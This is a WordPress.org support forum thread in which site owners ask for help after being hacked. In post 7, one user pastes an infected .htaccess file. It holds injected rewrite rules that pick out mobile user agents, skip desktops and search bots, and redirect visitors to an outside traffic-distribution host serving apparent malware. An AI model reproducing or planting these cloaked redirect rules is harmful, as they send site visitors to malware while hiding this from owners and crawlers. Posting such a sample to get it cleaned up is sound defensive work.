WordPress.org

Ready to get started?Download WordPress

Forums

Been Hacked. Found this in my .htaccess file (8 posts)

  1. ttj90
    Member
    Posted 2 years ago #

    How do,

    Interesting afternoon! Got hacked by a guy who even had the audacity to place his Facebook fan page on the picture that was being used as my blog and been investigating security all afternoon.

    I'm not the most savvy of developers, autodidact all the way and with ADHD it is quite an accomplishment to get this far!

    i was looking at my .htaccess and found this line:
    IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

    I'm not sure whether it is supposed to be there because seeing the word 'ignore' makes me wonder..

  2. ttj90
    Member
    Posted 2 years ago #

    it was right at the very top of the script

  3. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    It's for Front Page Server Extensions, tells the rewrite engine to ignore certain files usually...check with your host or if using Front Page check with MS for proper syntax...

    Can you provide your domain link and we can review...

  4. ttj90
    Member
    Posted 2 years ago #

    Nice one thank you.

    http://thetruejoe90.com

  5. esmi
    Forum Moderator
    Posted 2 years ago #

  6. ttj90
    Member
    Posted 2 years ago #

    I've so far done well then!
    Thanks for taking the time out to help ;)

  7. Ladyneko
    Member
    Posted 2 years ago #

    Hello

    I've made a website for someone which had been hacked, and i read a lot of to-do's and changed the codes both in the files on the server, and login.

    But apperently i havn't been throughout, 'cause when you enter http://www.sawadee.dk on a mobile platform, it redirects and tries do download something malware-looking.

    Unfortunately i'm on a long travel, and don't have the backup files i took at the time.

    my htaccess file looks really wrong, maybe you could help me correct it? i will start by deleting the last bits of the file, after #End WordPress it looks like this:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    RewriteEngine on

    RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC]

    RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
    RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
    RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
    RewriteCond %{HTTP_USER_AGENT} !unix [NC]
    RewriteCond %{HTTP_USER_AGENT} !macos [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
    RewriteCond %{HTTP_USER_AGENT} !google [NC]
    RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
    RewriteCond %{HTTP_USER_AGENT} !bot [NC]
    RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
    RewriteCond %{HTTP_USER_AGENT} !msn [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
    RewriteCond %{HTTP_USER_AGENT} !maui [NC]
    RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteCond %{QUERY_STRING} !wpc_nr [NC]

    RewriteRule ^(.*)$ http://wap-tds.in/?i=980&r=1785&p=6442&c=8 [L,R=302]

  8. Ladyneko
    Member
    Posted 2 years ago #

    I tried some stuff now, when i deleted the rewrite stuff, or tried to write another non-russian website (i don't know where that came from!) instead, my whole website won't work.

    it's funny 'cause it's only on mobile platforms the website is strange.

    I hope you can help, it's getting quite frustrating. Obviously i've never been hacked before, and i'm still abit new at wordpress.

Topic Closed

This topic has been closed to new replies.

About this Topic